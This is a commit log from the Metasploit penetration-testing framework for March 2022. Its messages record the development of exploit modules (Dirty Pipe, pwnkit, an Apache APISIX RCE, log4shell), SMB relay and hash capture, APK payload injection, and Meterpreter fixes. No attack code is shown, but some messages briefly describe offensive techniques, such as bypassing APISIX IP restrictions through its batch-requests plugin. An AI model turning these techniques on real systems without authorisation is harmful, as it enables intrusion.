Grant Willcox 02c616a29e Land #16207, Fix VNC scanner modules and libraries to make them work in 2022 2022-03-22 13:40:29 -05:00
Grant Willcox c0b0c418d2 Update constants explanation to explain VeNCrypt 19 option a little clearer 2022-03-22 13:06:45 -05:00
sjanusz b54cfee665 Open a new Meterpreter session when trying to upgrade Meterpreter 2022-03-22 14:08:25 +00:00
Spencer McIntyre 9cebba12d2 Add documentation for the native_spoofer module 2022-03-22 09:38:06 -04:00
Spencer McIntyre fd2d1c0784 Add and use the ListenerComm option for SOCKS 2022-03-22 09:23:09 -04:00
Spencer McIntyre 86aed4928e Add the HttpListenerBindPort to the log4shell exploit 2022-03-22 09:06:22 -04:00
Spencer McIntyre ff0ecfa49e Display the HTTP port when necessary 2022-03-21 20:11:31 -04:00
Spencer McIntyre da16aad96a Land #16298, Add the capture plugin 2022-03-21 20:03:16 -04:00
Grant Willcox 4e8613904a Address comments from review and make explanations tidier 2022-03-21 17:54:41 -05:00
Jeffrey Martin 122d380f85 Land #16368, Conditionally recalculate in ModuleSet 2022-03-21 17:50:03 -05:00
Grant Willcox d6d8bd57cb Land #16352, Add stale bot exemption for discussion label 2022-03-21 17:04:15 -05:00
Spencer McIntyre b41389c1dd Recalculate for tests 2022-03-21 17:44:10 -04:00
Spencer McIntyre e96abb1254 Rename the capture command
Multiple modules provide a "Capture" action that would collide with this
name. Rename it to `captureg` for Capture-Global.
2022-03-21 17:43:11 -04:00
Spencer McIntyre df04435d49 Only recalculate sometimes
Recalculations are time consuming, so only do it if necessary.
2022-03-21 17:00:31 -04:00
Spencer McIntyre 6ec530a5ee Improve some error handling 2022-03-21 15:22:00 -04:00
Spencer McIntyre 49aff227c5 Fix character escaping in the apisix exploit 2022-03-21 15:06:03 -04:00
Spencer McIntyre 12c2d6ff7b Apply rubocop updates to dns/native_spoofer 2022-03-21 14:02:43 -04:00
Spencer McIntyre 6abe2516d6 Update the module to use the Dnsruby API 2022-03-21 13:59:27 -04:00
Metasploit 6ef736ca46 automatic module_metadata_base.json update 2022-03-21 12:43:27 -05:00
Grant Willcox 024da204d1 Land #16353, respect ssl_version in crawler 2022-03-21 12:24:38 -05:00
Heyder Andrade 25c4869d8a Make module to ssh_defaults
Factory is provided by mixin;
Removed the options that were the same as the defaults;
Adjusted the exception to proper feedback the user. There was a return
as incorrect when it was indeed unable to negotiate the key exchange.
2022-03-21 18:06:32 +01:00
Grant Willcox 715082a960 Update exploit and module with new delay timing and latest copy of DLL 2022-03-21 12:05:48 -05:00
Spencer McIntyre a739083db9 Readd the missing SocketServer mixin for SMB 2022-03-21 11:51:10 -04:00
Spencer McIntyre 929e5d5e76 Update the SMB capture module with new options 2022-03-21 11:47:56 -04:00
Spencer McIntyre aca272dd76 Always return a comm from #_determine_server_comm
Instead of returning nil from Rex::Socket::SwitchBoard.best_comm, return
the local comm which Rex::Socket will defer to anyways.
2022-03-21 11:47:56 -04:00
Spencer McIntyre 551f159993 Don't pass nill to #best_comm
It'll crash if you do
2022-03-21 11:47:56 -04:00
Spencer McIntyre 0ab97b858f Update the TCP server and HTTP server mixins 2022-03-21 11:47:56 -04:00
Spencer McIntyre 2e4f04a804 Add and use the new bindhost/bindport options 2022-03-21 11:47:55 -04:00
h00die ff7b017e14 Land #16361, docs for adb_server_exec 2022-03-21 09:24:04 -04:00
sjanusz bbf9e3163a Fix file reads on Windows for binary files 2022-03-21 12:47:39 +00:00
Tim W a4956bfe7c Land #16358, fix apk injection on some apks by finding the correct hook point 2022-03-21 07:36:00 +00:00
Brendan Coles 4cd021ce4b Add exploit/android/adb/adb_server_exec documentation 2022-03-21 00:37:15 +00:00
Brendan Coles d9bd985cef Msf::Payload::Apk: find_hook_point: Return full packagename.classname 2022-03-19 21:08:02 +00:00
Florian Griesser e5e2d5d8b5 Added Documentation for auxiliary/scanner/ip/ipidseq 2022-03-19 16:34:41 +01:00
Tim W bdb729a43b Land #16340, fall back to running apktool with --use-aapt2 if apktool fails 2022-03-19 11:47:56 +00:00
Jeffrey Martin ebaf584a00 use 'Auto' for ssl_version 2022-03-18 17:06:02 -05:00
Metasploit 5faf25dbe3 automatic module_metadata_base.json update 2022-03-17 16:16:27 -05:00
Spencer McIntyre ccdc2db9e7 Land #16309, Catch an exception in ssh_login
The ssh_login module would crash when the channel used to execute the
commands to gather the platform information reported that they failed.
2022-03-17 16:41:47 -04:00
Spencer McIntyre da1e4853b8 Land #16317, Free UDP ports after use 2022-03-17 16:39:09 -04:00
Metasploit 1b31cc9a7c automatic module_metadata_base.json update 2022-03-17 15:23:17 -05:00
Spencer McIntyre acf3906953 Add another instance of missing error handling 2022-03-17 16:07:31 -04:00
bwatters 54ad2b82c3 Land #16249, Add in Exchange Mixin - Initial Version with Version Detection
Merge branch 'land-16249' into upstream-master
2022-03-17 15:04:17 -05:00
Metasploit 374220f72f Bump version of framework to 6.1.35 2022-03-17 12:05:14 -05:00
Grant Willcox 1bfc0feedb Remove default options from HttpUsername and HttpPassword as blank strings are still considered setting the option when it comes to OptString, and this leads to falsely assuming the strings are set by the user when they are not 2022-03-17 11:29:06 -05:00
Grant Willcox 6ee0ef0c8a Add in appropriate warning message in case we hit a snag, might help people out who hit a similar issue. Issue is highly tempermental and sometimes goes away for no reason so its hard to pin down but logging in this way should help. I tried doing things manually in code but it didn't seem to help and I don't want to block the code from working on something like this. 2022-03-17 11:29:05 -05:00
Grant Willcox ce062973cb Make changes from review process, redo code for module to make it make less requests, and generally improve overal operations. 2022-03-17 11:29:05 -05:00
Grant Willcox c1d6dced8d Update library code to read exchange versions from exchange_versions.json and populate exchange_versions.json with initial info 2022-03-17 11:29:01 -05:00
Grant Willcox 419c9ea554 Fix review comments to simplify regex, and also add in new is_exchange? function to check if a target is running Exchange Server or not. 2022-03-17 11:29:00 -05:00
Grant Willcox 1f53e9d1c4 Rubocop and fix a mistake on commenting too much of the code out from testing 2022-03-17 11:29:00 -05:00
Grant Willcox 269cd5cfed Add in Exchange Version mixin and module example 2022-03-17 11:28:53 -05:00
Hynek Petrak 43cec440ac Treat failed proof as successful connection with nil proof.
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2022-03-17 14:05:17 +01:00
Metasploit f9a74d4203 automatic module_metadata_base.json update 2022-03-16 17:48:55 -05:00
Grant Willcox e197669274 Land #16284, Add CVE-2021-31126 DoS Module 2022-03-16 17:29:47 -05:00
Ashley Donaldson 0abdd55234 Use a file in .msf4, copying it from the data directory if it doesn't exist.
Fixes some bugs relating to pivoting through a session
2022-03-17 09:18:43 +11:00
Hynek Petrak 2841f70048 Catch exception from net/ssh/connection/session.rb:381 2022-03-16 23:11:21 +01:00
Grant Willcox 0f2813f70c Update module and documentation for edits found whilst doing final pass of code 2022-03-16 16:55:03 -05:00
mauricelambert e678615f27 Fix items from code review 2022-03-16 16:54:38 -05:00
mauricelambert 33e12bf06f Correct CVE number, comments and documentation 2022-03-16 16:54:24 -05:00
mauricelambert b745a24a9d Random payload && TARGETURI option 2022-03-16 16:54:15 -05:00
mauricelambert d35b2528df Add markdown documentation for rb_dos_iis_2022_21907 2022-03-16 16:54:14 -05:00
mauricelambert 7c806a8723 Add auxiliary module for DOS IIS Server 2022-03-16 16:53:59 -05:00
Ashley Donaldson 9074d7b2bd Reformatted yaml file to be more flexible in future 2022-03-17 08:47:10 +11:00
Ashley Donaldson 40c422cdf7 Close NBNS, mDNS and LLMNR sockets when their modules are complete 2022-03-17 08:12:26 +11:00
Ashley Donaldson 972c260969 Fix double dereference by moving DNS cleanup into separate function, and force to run as job. 2022-03-17 08:12:25 +11:00
Ashley Donaldson 7fe9d0b2b6 Don't start the DNS server twice 2022-03-17 08:02:31 +11:00
Jeffrey Martin c3445ccb6f respect ssl_version in crawler
When utilizing `Anemone` to crawl pages using `Rex` sockets
Framework common `SSL` settings can pull from standardized options.
This change enables more fine grained user control and avoids issues
with missing or deprecated SSL versions in newer Ruby versions.
2022-03-16 14:24:45 -05:00
adfoster-r7 078f165ff4 Add stale bot exemption for discussion label 2022-03-16 14:50:19 +00:00
Metasploit c63490c050 automatic module_metadata_base.json update 2022-03-16 08:56:13 -05:00
bwatters b4de9fa92a Land #16344, Add module for CVE-2022-21999 and More Railgun Definitions
Merge branch 'land-16344' into upstream-master
2022-03-16 08:37:05 -05:00
Shelby Pace 381b91de45 change wording in arch check
Co-authored-by: Brendan <bwatters@rapid7.com>
2022-03-15 16:45:36 -05:00
Grant Willcox 008071888c Land #16347, Catch SocketError when normalizing the hostname 2022-03-15 16:45:29 -05:00
adfoster-r7 c9497ed94e Add additional new lines 2022-03-15 20:01:31 +00:00
Grant Willcox 3dfa082465 Land #16342, Update documentation/modules/payload/android/meterpreter/reverse_tcp.md to add in BlueStack reference and fix msftidy errors 2022-03-15 14:16:48 -05:00
Grant Willcox 24f8ffb273 Land #16350, Fix encrypted shells crashing with no DB connection 2022-03-15 13:56:03 -05:00
Spencer McIntyre e28ee9ca53 Improve an error message when addr is nil
The normalized value can be nil when the hostname failed to resolve.
That is not helpful in the exception information, so use the original
value.
2022-03-15 14:01:26 -04:00
space-r7 e96ec401bf add arch check, fix logic error, add aka note 2022-03-15 12:58:39 -05:00
Anshik Singh 9fbd547fcb Add in Bluestacks reference and then polish up documentation to fix msftidy errors and typos. 2022-03-15 11:01:30 -05:00
sjanusz a3f4af1775 Fix encrypted shells crashing with no DB connection 2022-03-15 16:00:30 +00:00
Spencer McIntyre a6a63d0895 Rename scope to zone_id 2022-03-15 11:14:41 -04:00
Metasploit c0185f65bf automatic module_metadata_base.json update 2022-03-15 08:24:21 -05:00
Spencer McIntyre 4dd7fc60e6 Land #16324, Fix broken DNS native_server 2022-03-15 09:06:03 -04:00
Ashley Donaldson 8cc2b87f59 Use Dnsruby::Message for all inputs 2022-03-15 16:41:05 +11:00
Ashley Donaldson efaf21cbed Show specific error message if module fails to load 2022-03-15 09:58:45 +11:00
Metasploit f524588355 automatic module_metadata_base.json update 2022-03-14 17:48:07 -05:00
bwatters c936c45167 Land #16186, Add Python Meterpreter Command Payloads
Merge branch 'land-16186' into upstream-master
2022-03-14 17:29:03 -05:00
Grant Willcox 2142c877ad Land #16262, Use bash instead of netcat as a default payload 2022-03-14 17:18:37 -05:00
Spencer McIntyre 71cacc4cc2 Catch SocketError when normalizing the hostname 2022-03-14 17:09:37 -04:00
Spencer McIntyre 28b7ebf9b2 Mention the ClaimsPrincipal gadget chain 2022-03-14 16:21:07 -04:00
space-r7 4a8707982a fix module name in output 2022-03-14 09:35:56 -05:00
space-r7 c646d01671 add systems tested 2022-03-14 09:17:43 -05:00
space-r7 99664efed7 use full user name, add test output to docs 2022-03-14 09:15:36 -05:00
adfoster-r7 bb351021d7 Update links 2022-03-14 13:40:44 +00:00
Spencer McIntyre 735c1256a3 Put reverse_netcat back in the default list
See #16262 for context. This will select reverse_bash if no required
commands are specified, which should be suitable for most environments.
The RequiredCmd payload compatibility key can be specified to override
this behavior by marking the commands that are available.
2022-03-14 09:16:39 -04:00
Grant Willcox 08ee09a447 Updated How to Apply to GSoC (markdown) 2022-03-13 18:26:44 -05:00
Grant Willcox 58e8807e7b Update date format so its cleaner and more less fluff. 2022-03-13 18:24:19 -05:00
Grant Willcox 0bac866443 Update contact methods to make it more explicit on preferred methods of contact. 2022-03-13 18:21:01 -05:00
Grant Willcox c758202a1d Updated GSoC 2022 Project Ideas (markdown) 2022-03-13 18:18:34 -05:00
Grant Willcox 6158c712aa Updated GSoC 2022 Project Ideas (markdown) 2022-03-13 18:16:34 -05:00
Grant Willcox c16234521f Add more clarity r.e contact methods for questions on ideas. 2022-03-13 18:16:08 -05:00
Grant Willcox b49a3fe38f Add in information about viewing past successful submissions, and link to the 2022 GSoC timeline page, as well as include some basic information about the timeline. 2022-03-13 18:09:16 -05:00
Grant Willcox 9d193bc03e Add in Slack point of contact details and Slack link to make it easier for people to find out where to contact mentors. 2022-03-13 17:46:02 -05:00
Grant Willcox 71423a0b76 Updated How to Apply to GSoC (markdown) 2022-03-13 17:40:54 -05:00
Grant Willcox 9496a655c0 Fix typos from last edit. 2022-03-13 17:39:44 -05:00
Grant Willcox 122de8da7b Mention the dedicated #gsoc channel in Slack to fall in line with Google's recent guidance on providing more explicit first point of contacts. 2022-03-13 17:38:55 -05:00
h00die a959725f7c implement vnc hash types 2022-03-13 13:27:38 -04:00
h00die cbd38a104e Updated How to Send an HTTP Request Using HttpClient (markdown) 2022-03-13 12:48:46 -04:00
h00die 397c7ee6d5 add mime link 2022-03-13 12:47:59 -04:00
Brendan Coles fe70296f1e Msf::Payload::Apk: Try rebuilding APK with AAPT2 if rebuilding APK fails 2022-03-13 14:35:15 +00:00
Tim W df81a48e4a Land #16332, fix zipalign to align shared object files 2022-03-13 12:48:22 +00:00
Tim W db19f88fdc Land #16334, fix signing apk files that are not signed with the v1 signing scheme 2022-03-13 12:41:10 +00:00
Brendan Coles d28a172ab4 Msf::Payload::Apk: Extract cert details from APK files not JAR signed
Since Android 11, APK contents must be signed with signature scheme
v2 or higher (v2/v3/v4). In order to maintain compatibility with
older versions of Android, APKs can also be signed with v1 (after
first signing with v2/v3/v4), but this is not mandatory.

When using a template apk file, the APK library now attempts to
extract signing scheme v1 certificate details (using keytool)
and falls back to extracting v2/v3/v4 certificate details (using
apksigner) if the APK is not signed with signing scheme v1.

Fixes #16295.
2022-03-12 18:40:37 +00:00
Brendan Coles 6ae54566b6 Msf::Payload::Apk: zipalign: align APK stored shared object files 2022-03-12 18:22:34 +00:00
Metasploit e29711661b automatic module_metadata_base.json update 2022-03-11 15:12:45 -06:00
space-r7 96e7e55496 Land #16252, add GitLab GraphQL user enum module 2022-03-11 14:53:13 -06:00
Metasploit 9d6d9df246 automatic module_metadata_base.json update 2022-03-11 12:32:38 -06:00
adfoster-r7 d9285044ec Land #16326, Fix SMB signing detection when SMB1 is disabled 2022-03-11 18:13:18 +00:00
Jake Baines a602c10241 Add a print statement indicating requests are ongoing 2022-03-11 07:19:09 -08:00
Jake Baines d7213ed895 Merge date changes 2022-03-11 07:02:44 -08:00
Jake Baines e3061d1ddd Added blog link. Switched to service_details and create_credential_and_login. Added some exit print info and updated docs 2022-03-11 07:00:21 -08:00
Metasploit 60a9c8db96 automatic module_metadata_base.json update 2022-03-11 06:26:20 -06:00
adfoster-r7 a62ca2259e Land #16316, deref services correctly 2022-03-11 12:08:42 +00:00
Ashley Donaldson 8c35870a63 Make parsers instance variables to make rubocop happy 2022-03-11 16:56:10 +11:00
Ashley Donaldson 06cc16c4cb Rubocop changes 2022-03-11 16:16:04 +11:00
Ashley Donaldson 538b680e79 Split tab completion into separate methods for each sub-command 2022-03-11 15:18:58 +11:00
Ashley Donaldson b34189e24c Take more parameters from a config file 2022-03-11 15:10:08 +11:00
Ashley Donaldson 1349a7c486 More redundant cleanup calls 2022-03-11 12:22:27 +11:00
Ashley Donaldson 1576fd720e Remove another redundant cleanup 2022-03-11 12:17:30 +11:00
Ashley Donaldson d5373a7278 Removed redundant cleanup calls which exploit_driver will call anyway 2022-03-11 12:08:51 +11:00
space-r7 07e6eef201 rename module, modify check 2022-03-10 17:02:58 -06:00
space-r7 bc9f64f043 use default printer in case target is server
clean up code, add EnumPrinters definitions
2022-03-10 16:45:20 -06:00
Jeffrey Martin ee5a2a30fe slack link 2022-03-10 14:51:28 -06:00
Spencer McIntyre b5c481fd4c Fix SMB signing detection when SMB1 is disabled 2022-03-10 13:09:18 -05:00
Metasploit 8ec9c89a1d Bump version of framework to 6.1.34 2022-03-10 12:05:16 -06:00
Metasploit 37b1d78e1c automatic module_metadata_base.json update 2022-03-10 11:35:16 -06:00
space-r7 b747e55dda Land #16303, add Dirty Pipe exploit 2022-03-10 11:16:28 -06:00
space-r7 872b9c9a7c modify docs to reflect changes, remove 'return' 2022-03-10 10:39:32 -06:00
space-r7 2f86c78c91 remove check mode, check by kernel version only 2022-03-10 10:02:05 -06:00
space-r7 2102c7daca add binaries for pre-compiled option 2022-03-10 08:50:48 -06:00
Grant Willcox dceedb14bd Fix up some typos 2022-03-10 08:15:04 -06:00
Simon Janusz d6ff12f23b Land #16322, Fix hosts command bugs
Fix hosts command bugs
2022-03-10 13:45:50 +00:00
Tim W 472c26924a fix kernel version check 2022-03-10 07:47:58 +00:00
Ashley Donaldson 1c84c1a314 More suggestions from code review 2022-03-10 17:29:17 +11:00
Ashley Donaldson 0c968cd38b Apply suggestions from code review
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2022-03-10 17:17:45 +11:00
Ashley Donaldson 09b094cd64 DNS server: When there are multiple answers, set the answer, not the question, in the returned packet 2022-03-10 15:05:52 +11:00
Ashley Donaldson 9b651eef32 Use encode (from Dnsruby), not data (from Net::DNS) 2022-03-10 13:31:58 +11:00
Ashley Donaldson c3465a8ad8 Fix whitespace EOL for msftidy 2022-03-10 11:16:01 +11:00
Ashley Donaldson 6f159fa54e Consistent handling of DNS and LDAP servers wrt ServiceManager 2022-03-10 11:01:37 +11:00
Ashley Donaldson 9761d68c19 Rename stop_service to cleanup_service for services that use reference counting 2022-03-10 10:28:25 +11:00
Spencer McIntyre c2e0a61a74 Fix the hosts command's tab completion 2022-03-09 18:17:14 -05:00
Spencer McIntyre 5c5340b6fd Fix the hosts command's --search flag 2022-03-09 18:17:09 -05:00
Ashley Donaldson 1494f804e7 Fix bug in java_rmi_server which would unilaterally close the HTTP server 2022-03-10 09:29:45 +11:00
Ashley Donaldson 9445c7824d Fix bug in safari file policy module: don't stop the service; just dereference it, and trust the service manager 2022-03-10 09:07:11 +11:00
Ashley Donaldson c9d43aafe6 Use dereferencing directly, and rename 'stop' to 'cleanup' for clarity 2022-03-10 09:06:25 +11:00
Metasploit 0296e59a5c automatic module_metadata_base.json update 2022-03-09 13:07:02 -06:00
Spencer McIntyre 5cc892edad Land #16312, Fix arch check and cd in pwnkit 2022-03-09 13:48:35 -05:00
adfoster-r7 49bea72ba8 Land #16311, install mingw in Docker 2022-03-09 17:10:08 +00:00
bwatters 5505d05d04 Maybe actually fix arch check this time... 2022-03-09 11:06:26 -06:00
Metasploit d88c5752d2 automatic module_metadata_base.json update 2022-03-09 10:04:04 -06:00
Spencer McIntyre 93d9dbe7f3 Land #16098, Update smb_relay for smb 2 & smb3 2022-03-09 10:44:52 -05:00
Heyder Andrade e67c70e422 Ensure default options gets override 2022-03-09 13:24:06 +01:00
Heyder Andrade 77dc0722b4 Update modules/exploits/unix/ssh/tectia_passwd_changereq.rb
Ensure we're overriding the defaults

Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2022-03-09 13:02:15 +01:00
Heyder Andrade dd47017b5c Added support to old key exchange algorithms
This commit fix the issue #16138 by adding support to old key
exchange algorithms in the net/ssh lib by defining the
`append_all_supported_algorithms` to `true`.
2022-03-09 10:25:50 +01:00
Tim W bcc9d01958 add documentation 2022-03-09 08:34:20 +00:00
Tim W 955cc9c986 fix cross compiling 2022-03-09 06:59:25 +00:00
Tim W b5e88f24df feedback from space 2022-03-09 06:06:53 +00:00
adfoster-r7 3b524360ed Explicitly specify server/client versions, fix logger crash, and specify jtr format 2022-03-09 01:37:22 +00:00
bwatters ae0f1729c1 Update arch check 2022-03-08 18:21:34 -06:00
Ashley Donaldson 837cf199a0 Use reference counting consistently for HTTP handlers (Fixes #16315) 2022-03-09 10:56:38 +11:00
adfoster-r7 22f88f9ab7 Add docs 2022-03-08 23:52:24 +00:00
adfoster-r7 6f2a7d6167 Add note that SMB v1 is not supported 2022-03-08 23:52:24 +00:00
adfoster-r7 53772fa366 Gracefully handle relay host timeout, fix typos, and move SMBHashCapture location 2022-03-08 23:52:24 +00:00
adfoster-r7 a0e1306251 Use latest ruby_smb release 2022-03-08 23:52:24 +00:00
adfoster-r7 bcb0850e07 Rename SMBHOST 2022-03-08 23:52:23 +00:00
adfoster-r7 144fc5eddf Add smarter targetlist support 2022-03-08 23:52:23 +00:00
adfoster-r7 25265c7a7b Linting 2022-03-08 23:52:23 +00:00
adfoster-r7 3e68e298a1 Add targets 2022-03-08 23:52:23 +00:00
adfoster-r7 e02021ee91 Fix database cred reporting and error handling 2022-03-08 23:52:23 +00:00
adfoster-r7 507b1dab2b Apply PR feedback 2022-03-08 23:52:22 +00:00
adfoster-r7 b4fe2502aa Update smb_relay to support smb 2 and smb3 2022-03-08 23:52:22 +00:00
Ashley Donaldson 4652605458 Respect communication channel when selecting existing service within ServiceManager (resolves #16314) 2022-03-09 10:22:11 +11:00
Jeffrey Martin 349ee4d237 add LDAP query idea 2022-03-08 14:05:13 -06:00
Spencer McIntyre fe57bebc58 Land #16310, only iterate if RHOSTS is registered 2022-03-08 14:31:59 -05:00
bwatters fb7f2ba326 Fix arch check and on_session cd 2022-03-08 13:16:32 -06:00
adfoster-r7 79761c942c Ignore iterating multiple rhosts if option not registered 2022-03-08 17:52:42 +00:00
sjanusz 41d52f9f3e Install mingw in Docker 2022-03-08 17:43:51 +00:00
Tim W a195c65121 change default suid binary from /usr/bin/sudo to /bin/passwd 2022-03-08 16:37:07 +00:00
Tim W 300ab51079 feedback from jvoisin 2022-03-08 16:22:31 +00:00
Grant Willcox f5162eecea Adding self to mentor list 2022-03-08 10:20:30 -06:00
Tim W 0c7806222f msftidy 2022-03-08 10:28:04 +00:00
Tim W 676c4a6f4f improve fork behaviour 2022-03-08 10:24:25 +00:00
Tim W a614f9c2aa add a description and PrependFork 2022-03-08 10:17:06 +00:00
adfoster-r7 db9c544e6f Land #16302, Defer TLV logging until session is bootstrapped 2022-03-08 09:58:49 +00:00
Tim W 7ca6a28c05 embed payload inside exploit and add check method 2022-03-08 09:51:49 +00:00
Ashley Donaldson 0733f1e00e Force capture defaults to come from the data file 2022-03-08 11:30:59 +11:00
Ashley Donaldson e4f5d5a539 Merge branch 'master' into hash_capture 2022-03-08 07:57:42 +11:00
Metasploit f86753ccb9 automatic module_metadata_base.json update 2022-03-07 14:20:49 -06:00
space-r7 a91bf22758 Land #16286, replace IO.read with File.binread 2022-03-07 14:01:19 -06:00
Metasploit b72c0674c5 automatic module_metadata_base.json update 2022-03-07 11:19:41 -06:00
space-r7 7a9d30e5b1 Land #16227, add wp masterstudy privesc module 2022-03-07 10:58:23 -06:00
space-r7 47532bb49a use Faker for email and user names 2022-03-07 10:57:40 -06:00
Tim W 5bd48d0a7d initial commit of dirtypipe 2022-03-07 15:49:27 +00:00
sjanusz d99d14eaa8 Defer TLV logging until session is bootstrapped 2022-03-07 15:47:49 +00:00
Metasploit 80ce51ece0 automatic module_metadata_base.json update 2022-03-07 09:23:16 -06:00
Spencer McIntyre c02b3da666 Land #16282, Add lcat command for meterpreter 2022-03-07 09:56:24 -05:00
Spencer McIntyre 42e0c027ab Land #16248, Added Apache APISIX RCE module 2022-03-07 09:47:04 -05:00
Spencer McIntyre 422f96fbbe Fix a plugin name reference
The plugin is actually "batch-requests", change the reference to be more
clear.
2022-03-07 09:46:15 -05:00
Ashley Donaldson 02bb5234a3 Update help, fix POP3S port and disable DNS (broken) and WPAD (not actually useful) 2022-03-07 21:40:31 +11:00
Ashley Donaldson a212cd57e5 HTTPS modules should use encryption 2022-03-07 15:12:34 +11:00
Ashley Donaldson 9b7107a711 Close handle to log file once the capture has ended (or a new one has begun) 2022-03-07 11:34:36 +11:00
Pedro Ribeiro e0c8108942 add docs for sslvpn module 2022-03-06 23:15:53 +00:00
Pedro Ribeiro e1079a587d remove cache flush from shellcode, dont need it 2022-03-06 23:02:02 +00:00
Tim W 2984a11bb4 Land #16294, replace jarsigner with apksigner for apk injection 2022-03-06 14:54:08 +00:00
Brendan Coles 7bb575a24e Msf::Payload::Apk: Replace jarsigner with apksigner
This allows signing APK files with Signature Scheme v2/v3/v4.
2022-03-06 13:50:38 +00:00
h00die 86cad29799 wp masterstudy review 2022-03-06 08:07:20 -05:00
Tim W 2560aa394c Land #16288, raise and show apktool output if the output contains Java exceptions 2022-03-06 08:32:50 +00:00
Tim W 0a57e1092c Land #16292, fix typo in pwnkit documentation 2022-03-06 07:35:37 +00:00
red 23a09be333 Fix typo in document of cve_2021_4034
ContOS => CentOS
2022-03-05 23:58:31 +08:00
Brendan Coles be928f9154 Msf::Payload::Apk: raise if apktool output includes Java exceptions 2022-03-05 15:32:24 +00:00
Brendan Coles ef4e7b2165 post/windows/manage/persistence_exe: Replace IO.read with File.binread 2022-03-05 13:24:55 +00:00
Tim W 458b081bee Land #16283, raise if APK is unsigned during apk injection 2022-03-05 09:14:50 +00:00
Brendan Coles ac72803543 Msf::Payload::Apk: raise if APK is unsigned or generating new key fails 2022-03-05 05:36:24 +00:00
3V3RYONE ea954f7585 add lcat in spec tests 2022-03-05 10:13:32 +05:30
3V3RYONE 58484f3ae0 add lcat cmd functionality 2022-03-05 10:11:45 +05:30
space-r7 aa87d5d387 add fixed definitions and exploit 2022-03-04 15:56:28 -06:00
space-r7 f116f9e701 add docs 2022-03-04 15:54:58 -06:00
Heyder Andrade d7c992f402 Need to use POST to check whether the batch request is enabled or not 2022-03-04 21:00:32 +01:00
Spencer McIntyre 9ef50a2d23 Fixup typos 2022-03-04 12:34:14 -05:00
adfoster-r7 e9393e471c Land #16258, convert unknown tlv types to readable strings 2022-03-04 16:55:39 +00:00
adfoster-r7 1253878dd3 Land #16135, Add setg sessiontlvlogging command to log TLV packets 2022-03-04 16:30:09 +00:00
sjanusz ae704eb067 Add support for multiple tlv types when logging 2022-03-04 16:20:20 +00:00
Metasploit 02143c5142 automatic module_metadata_base.json update 2022-03-04 09:18:26 -06:00
Spencer McIntyre 83b2f5a128 Land #16268, Update check comhijack 2022-03-04 09:59:49 -05:00
sjanusz a2fadf0606 Init logging on meterpreter's init, add option to change log file 2022-03-04 14:21:00 +00:00
dwelch-r7 e1ccd178ff Land #16141, Add service manager commands to msfconsle 2022-03-04 13:47:46 +00:00
adfoster-r7 f29ff681f7 Rename to _servicemanager and hide behind a feature flag 2022-03-04 12:45:15 +00:00
Simon Janusz 47cdbea16f Land #16179, Update Meterpreter file existence tests for CI environments
Update Meterpreter file existence tests for CI environments
2022-03-04 12:13:51 +00:00
Simon Janusz 9a2e2c7deb Land #16162, Add explicit Github action permissions
Add explicit Github action permissions
2022-03-04 12:09:44 +00:00
dwelch-r7 5cfb692567 Land #16145, Fix to_handler case sensitivity issue 2022-03-04 12:04:44 +00:00
adfoster-r7 2cd6e66791 Land #16269, Msf::Payload::Apk: Check Java is installed and apktool.jar exists 2022-03-04 11:33:34 +00:00
adfoster-r7 39e55af982 Land #16270, Msf::Payload::Apk: raise if keytool cannot parse APK file or certificate 2022-03-04 11:30:02 +00:00
Brendan Coles 69f7008a07 Msf::Payload::Apk: raise if keytool cannot parse APK file or certificate 2022-03-04 08:10:37 +00:00
Brendan Coles 03419e8a19 Msf::Payload::Apk: Check Java is installed and apktool.jar exists 2022-03-04 06:39:51 +00:00
Metasploit a3a2afdf80 automatic module_metadata_base.json update 2022-03-03 20:00:59 -06:00
adfoster-r7 383fa316cc Land #16219, Update core enumextcmd and loadlib commands to show human readable strings 2022-03-04 01:35:29 +00:00
adfoster-r7 ad2fab6fee Land #16153, read full response on smtp send/recv 2022-03-04 01:24:46 +00:00
Heyder Andrade 4d5716d891 Updated documentation 2022-03-04 02:21:42 +01:00
Heyder Andrade ca4ed9affe Added logic to treat the two ways of execute command
If we have the API token we can execute command using the parameter
`filter_func` or `script`, and if there is an IP restriction
enabled by the plugin ip-restriction we can bypass this restiction if
the plugin batch-request is also enabled.
2022-03-04 02:13:09 +01:00
adfoster-r7 dd3cca5037 Land #16265, Fix race condition in jobs cleanup that could allow it to clean up twice simultaneously 2022-03-04 00:45:33 +00:00
Ashley Donaldson 499ba611e5 Move cleaned_up flag up so that cleanup is never re-entrant 2022-03-04 10:59:14 +11:00
Metasploit f665b7cf50 automatic module_metadata_base.json update 2022-03-03 15:29:29 -06:00
bwatters fb658fbb13 Land #16245, pfSense Authenticated File Write (CVE-2021-41282)
Merge branch 'land-16245' into upstream-master
2022-03-03 15:08:34 -06:00
bwatters 3f35524c61 Rubocop fixes 2022-03-03 13:02:55 -06:00
bwatters f0878f4d1a Improve check method and add autocheck 2022-03-03 12:52:05 -06:00
Metasploit d5bdcd276f Bump version of framework to 6.1.33 2022-03-03 12:04:36 -06:00
Spencer McIntyre 098d11d281 Land #16266, Fix bug in tab completion of dirs 2022-03-03 12:00:18 -05:00
Spencer McIntyre d52bee3201 Remove an unnecessary duplicate line 2022-03-03 11:57:25 -05:00
Metasploit 9dc9546b44 automatic module_metadata_base.json update 2022-03-03 08:43:22 -06:00
Spencer McIntyre 6be3443680 Land #16103, LPE in polkit's pkexec (CVE-2021-4034) 2022-03-03 09:24:11 -05:00
Spencer McIntyre 0463373756 Simplify finding pkexec 2022-03-03 09:19:45 -05:00
adfoster-r7 7f52b71931 Land #16264, handle failed Github authentication when generating info -d docs
Add rescue for failed authentication on `info -d`
2022-03-03 14:18:58 +00:00
Spencer McIntyre 1034c2461f Updated GSoC 2022 Project Ideas (markdown) 2022-03-03 08:44:16 -05:00
Spencer McIntyre 1555bbbe3a Updated GSoC 2022 Project Ideas (markdown) 2022-03-03 08:42:05 -05:00
bwatters c9408c7b1b Remove pointless format string 2022-03-03 06:40:26 -06:00
Heyder Andrade 460584b079 Improved server header validation 2022-03-03 12:48:37 +01:00
sjanusz 3871ac9eac Improve TLV Type handling 2022-03-03 10:07:43 +00:00
Ashley Donaldson a31b2ff1d5 Rename capture module 2022-03-03 17:26:04 +11:00
Ashley Donaldson f6e88d0405 Fix bug in tab completion of directories 2022-03-03 15:57:10 +11:00
Ashley Donaldson d1567bf2a5 Add logging and recording hashes for later use 2022-03-03 14:51:53 +11:00
